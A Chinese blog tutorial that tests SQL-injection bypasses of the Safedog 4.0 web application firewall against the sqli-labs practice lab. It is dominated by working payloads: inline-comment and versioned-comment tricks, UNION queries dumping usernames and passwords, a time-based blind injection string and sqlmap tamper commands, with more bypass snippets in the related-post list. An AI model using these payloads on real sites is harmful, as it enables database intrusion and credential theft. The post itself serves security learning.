Safedog 4.0 bypass绕过

已于 2023-02-28 17:00:59 修改
阅读量3.7k 收藏
点赞数 3
分类专栏: web安全 学习日常 文章标签: mysql
于 2023-02-28 16:55:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/129265271
版权

文章目录

安全狗介绍

安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗云安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。
这次介绍的就是针对sql注入,如何去绕过安全狗的防护机制。

测试环境

操作系统:windwos10
php集成环境:PHPStudy_pro(下载地址:https://www.xp.cn/download.html)
php版本:5.4.45
Apache版本:2.4.39
MySQL版本:5.7.26

安全狗版本(Apache版):4.0.266(下载地址:http://free.safedog.cn/)

sqli-labs注入靶场(下载地址:https://github.com/Audi-1/sqli-labs)

在安装安全狗前,需要先启动apache服务
cd到apache的**bin**目录
image.png
用管理员权限打开dos命令窗口,运行:

httpd.exe -k install -n apache2.4

开启成功后,win+r打开services.msc打开服务
image.png
在"服务"中可以看到apache2.4服务,即开启成功。
接着就可以安装安全狗了,安装时,会自动填充服务名,直接安装即可。

绕过bypass测试

现在的软WAF一般都是基于正则匹配进行过滤的,厂商需要考虑到用户体验,权衡可用性和安全性。我们需要理解数据库语法、函数、以及特性,从而通过不断fuzz来测试可以用的payload。

1.首先判断注入点:

image.png

2.注释闭合:

image.png
证明存在注入点。

3.and测试

image.png
发现被安全狗拦截,接下来要做的就是测试出被检测到的位置,摸索过滤的规则,从而进行绕过。
我们可以切块测试,比如and 1=1被过滤,我们可以分块进行输入,从而来判断过滤点:

and 						//不拦截
and加一个空格		//不拦截
and 1  					//拦截
and 1= 					//拦截
and 1=1 				//拦截
and =   				//不拦截

由上述结果我们可以判断,and(空格)+数字 则会被拦截,那么我们需要对被拦截的语句进行替换或者变形绕过。
首先我们对空格进行替换,看看是否能够绕过waf正则匹配,我们可以使用/**/注释符来代替空格

?id=1' and/**/1=1--+

image.png
可以看到,随着安全狗的升级迭代,现在这种简单的绕过已经没用了。
但可以想到既然是注释符,那么在注释符内加上垃圾字符,也是不会影响数据库语句执行,但有没有可能加上垃圾字符就能绕过安全狗对/**/注释符的过滤呢?可以尝试一下:/*§Fuzz§*/
最简单的方式,可以通过burpsuite自带的爆破功能进行Fuzz测试
image.png
image.png
可以看到,长度为951的payload都是可以进行绕过的

?id=1' and/*//*/1=1--+

image.png
可以看到绕过成功,这就是最简单的一种Fuzz绕过方法。

4.order by 字段判断
?id=-1' order by 3--+

image.png
被拦截,测试被拦截的位置:

order							//不拦截
order加一个空格		//不拦截
order by					//拦截

这里的话,只有order by组合在一起,才会被过滤
还是老办法,尝试/*//*/绕过

?id=1' order/*//*/by 3--+

image.png

5.union select绕过

image.png
常规输入,还是会被过滤,照常,还是需要先测试出被拦截的规则

union
union加一个空格
union select
union select 1

过滤的是union select,直接通过/*//*/进行测试

?id=-1' union/*//*/select 1,2,3--+

结果发现还是会被拦截
image.png
可以重新fuzz一下,尝试其他特殊字符能否绕过/!+-*
image.png
还是有很多组合能绕过的

id=-1' union/*//+/*/select 1,2,3--+

image.png

当然,这里的话,/*//*/也可以配合内联注释/*!...*/进行绕过。
/*! ...*/在很多地方,都是注释的意思,但在mysql中,就不是简单的注释,mysql为了兼容性问题,在开发中,可以将一些仅在mysql中特有的语句放在/*!...*/中,这样的话,这些语句如果在其他数据库中是不会被执行,只有在mysql环境下才会执行。
mysql还允许在!后加上版本号,如果版本号小于等于数据库版本,则执行/*!...*/里面的数据库语句,否则则不执行。
比如:

/*!50001 select * from test */;

这里的50001表示假如 数据库是5.00.01以上版本,该语句才会被执行。
payload如下:

?id=-1' union/*//*//*!50445select*/ 1,2,3--+

image.png
经过Fuzz测试,这里的版本号区间在{0-4}{0-9}44{0-9}、5044{0-9},区间范围内都能绕过

6.database()绕过

直接查数据库,直接被拦截

?id=-1' union/*//*//*!50445select*/ 1,2,database()--+

image.png
经过测试,并不对database关键字进行过滤,而是对database()函数进行过滤,通过////进行绕过
image.png

?id=-1' union/*//*//*!50445select*/ 1,2,database(/*//*/)--+

image.png

7.查询表名

查询security库中的所有表名:
通过测试,不对以下函数进行拦截

group_concat(table_name) 不拦截
from 不拦截
information_schema.tables不拦截
where 不拦截
table_schema不拦截

这里很奇怪,自己测了一下,前面的语句,如果换了其他的绕过方式,那么这里的话,则会对information_schema.tables进行严格过滤。而这里的话,并没有对information_schema.tables进行拦截

?id=-1' union/*//*//*!50445select*/ 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(/*//*/)--+

image.png

information_schema绕过

–+是注释,注释后加%0a换行继续执行

http://172.21.1.130/sqli/Less-1/?id=-1' union/*/!*!**/select 1,2,group_concat(table_name)from/*!--+/*%0ainformation_schema.tables*/ where table_schema='security'--+

http://172.21.1.130/sqli/Less-1/?id=-1' union/*//*//*!50445select*/ 1,2,group_concat(table_name) from /*!--+/*%0ainformation_schema.tables*/ where table_schema=database(/*//*/)--+

http://10.211.55.9:8080/sqli-labs/Less-1/ ?id=-1' union/*/-+-*/select 1,(select/*/-+-*/group_concat(table_name) from /*!--+*//*%0ainformation_schema./*!tables*/ where table_schema=database/*/--/*/()),3%23

?id=-1' union/*//*//*!50445select*/ 1,2,group_concat(table_name) from information_schema.tables where table_schema=database(/*//*/)--+
8.查询字段名

查询users表中的字段名:
通过测试,还是没拦,直接注出字段名

?id=-1' union/*//*//*!50445select*//*//*/1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

image.png

9.获取字段内容

获取users表中的username,password字段内容:
语法不变,直接查数据

?id=-1' union/*//*//*!50445select*//*//*/1,2,group_concat(username,'--',password) from users--+

image.png

后面想了想,如果说数据特别多的话,还是需要用到sqlmap,就根据过滤方法,写了一个tamper,但是发现还是有点bug,时间注入还是存在点问题,后面写完再放出

sqlmap -u "http://172.21.1.130/sqli/Less-1/?id=1" --tamper Safedog2 --random-agent --flush -v 3 --batch --dbms mysql -D security --tables --tech=U

image.png

image.png
盲注:

http://172.21.1.130/sqli/Less-1/?id=1' and/*//*/ (SELECT 4789 FROM (SELECT(SLEEP/*/--/*/(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) /*!14400AS*/ NCHAR),0x20) FROM /*!-- *//*%0aINFORMATION_SCHEMA./*!TABLES*/ WHERE table_schema=0x7365637572697479),1,1))=52,0,5)))))mCyh)-- djVO

sqlmap -u "http://172.21.1.130/sqli/Less-1/?id=1" --tamper Safedog2 --random-agent --flush -v 3 --batch --dbms mysql -D security --tables --tech=T

image.png

keepb1ue
关注
专栏目录
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5540
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
ByPASS系列之安全狗
游魂的博客
12-07 928
绕过安全狗: 内联注释法:/*! */ 首先测试拦截关键字:and 1=1 被拦 内联注释测试:/*!10440and*/1=1 http://xxxx.com:8888/int.php?id=5 and 1=1 可以看到已经绕过安全狗检测,/*!数字and*/1=1,内联注释中的数字是通过模糊测试出来的。 注意:/*!数字*/ 数字小于数据库版本关键字会执行,大于数据库的版本关键字不会执行...
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)_sql注入绕最新安全狗
最新发布
heike_Ch的博客
08-08 813
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
安全狗bypass
凝聚力安全团队
07-22 369
目录sql注入xss目录扫描 sql注入 http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-1--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-2--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/order--+/
安全狗- bypass技巧
qq_45951598的博客
05-07 215
sql注入bypass 判断是否存在注入 payload ?id=2' and -ascii('a')=-abs('-97') --+ hhp参数污染 payload ?id=1' /*&id=1' order by 99 --+ */ 报错注入payload ?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.table
SQL注入-安全狗apache最新版绕过
crowsec
01-26 1592
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01背景知识 现在的环境下对web选手越来越不友好,如果想在web场景中去挖洞,基本上都要面对waf,而常用的waf产品有很多,本次以开源免费最新版安全狗为例,绕过waf获取数据。 tips:本文需要您提前掌握一定的基础知识! 02环境配置 Windows10主机 phpstudy2018 sqli-labs靶场 安全狗apache4.0.30255 当前版本是最新版安全狗(截止2021.05.17) ...
网站安全狗V4.0绕过姿势
干铮的博客
09-27 3970
网站安全狗下载地址: 网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html DVWA下载: 链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享 已DVWA SQL注入为例对网站安全狗进行绕过测试。 1.查看安全狗防御规则匹配库。 2.绕过分析 字符 ...
bypass 学习笔记之绕安全狗||bypass safedog
Summer's blog
05-13 3309
目录前言0x00 前期准备0x01 开始尝试绕开判断字段数联合查询爆数据Reference Resources 前言 走上安全这条路也有9个月了,虽然中途有两个月一直在准备其他的事情,但是安全这条路一直在坚持着。 学习安全这么久了,从一开始的脚本小子,我也一直想转变一下,改变自己的现状,但是因为种种事情,给耽误了这个计划。 因为接触最多漏洞应该是SQL注入吧,所以我第一想到就是bypass ...
软WAF上传绕过+wbehshell免杀-漏洞银行大咖面对面9-ian
07-31
### 软WAF上传绕过与WebShell免杀技巧详解 #### 一、背景介绍 随着互联网技术的发展,Web应用程序的安全性越来越受到重视。Web应用防火墙(WAF)作为保护Web应用的一种常见手段,被广泛应用于各种场景中。然而,...
safedog——liunx64
06-08
safedog——liunx64
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1779
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
Bypass安全狗
sun_k的博客
09-08 662
0x00 手工fuzz绕过安全狗 环境 安全狗最新ApacheV4.0版(Windows) Sqli-lab-Less-1 Phpstudy集成环境:Apache2.4.39、Mysql5.5.29 Sqli-lab-Less-1中包含了联合查询、报错注入、布尔盲注、时间延时盲注等注入姿势,方便我们进行测试。 1、fuzz安全狗拦截策略 http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1' 报错且不拦截 http
安全狗绕过
alien0011的博客
06-09 3460
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
sql注入绕过最新apache版安全狗(环境:phpstudy下sqllibs)
m0_61398945的博客
08-04 1058
sql注入绕过安全狗
安全狗绕过
weixin_30564901的博客
07-01 993
3.5 加空格 换行 CoNtent-Disposition大小写或者空格或1 删除Content-Type: image/jpeg 删除form-data data前加空格 php后加:绕过 3.5文件名.php后面加#### form的m大写 ...
绕过safedog的方法
weixin_33997389的博客
10-14 377
看链接: http://www.hzjxn.com/Article/List.asp?SelectId=249&ClassId=2 and 1=2 以上会提示被安全狗拦截 丢个垃圾参数fuck,给的值必须是%00. OK了。因为他是对url进行审计的,而不是参数的值。所以可以这么绕,但是程序内部防注入的是通过函数来过滤。所以不行 看连接 http://ww...
mysql特性绕过安全狗_绕过安全狗新版进行SQL注入
weixin_39641738的博客
02-28 199
前言在圈子见到某师傅过了安全狗然后注入,然后自己手痒也搭了个环境进行测试。期间搭建环境各种坑….不过后面还是有个不错的结果的正文首先我是用phpstudy+安全狗4.0搭建的环境一开始找不到apache名称,按照网上的来整也不行(一堆重复的沙雕)解决方法:以管理员权限运行cmd,进入apache/bin目录httpd -k install -n apache2.4以管理员权限运行cmd,进入mys...
WEB漏洞:文件上传WAF绕过与安全策略优化
在第24天的学习中,我们深入探讨了WEB漏洞中的文件上传问题,特别是针对Web应用防火墙(WAF)绕过的策略以及如何进行安全修复。主要内容包括以下几个方面: 1. **上传参数名解析**: - **Content-Disposition**: 这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值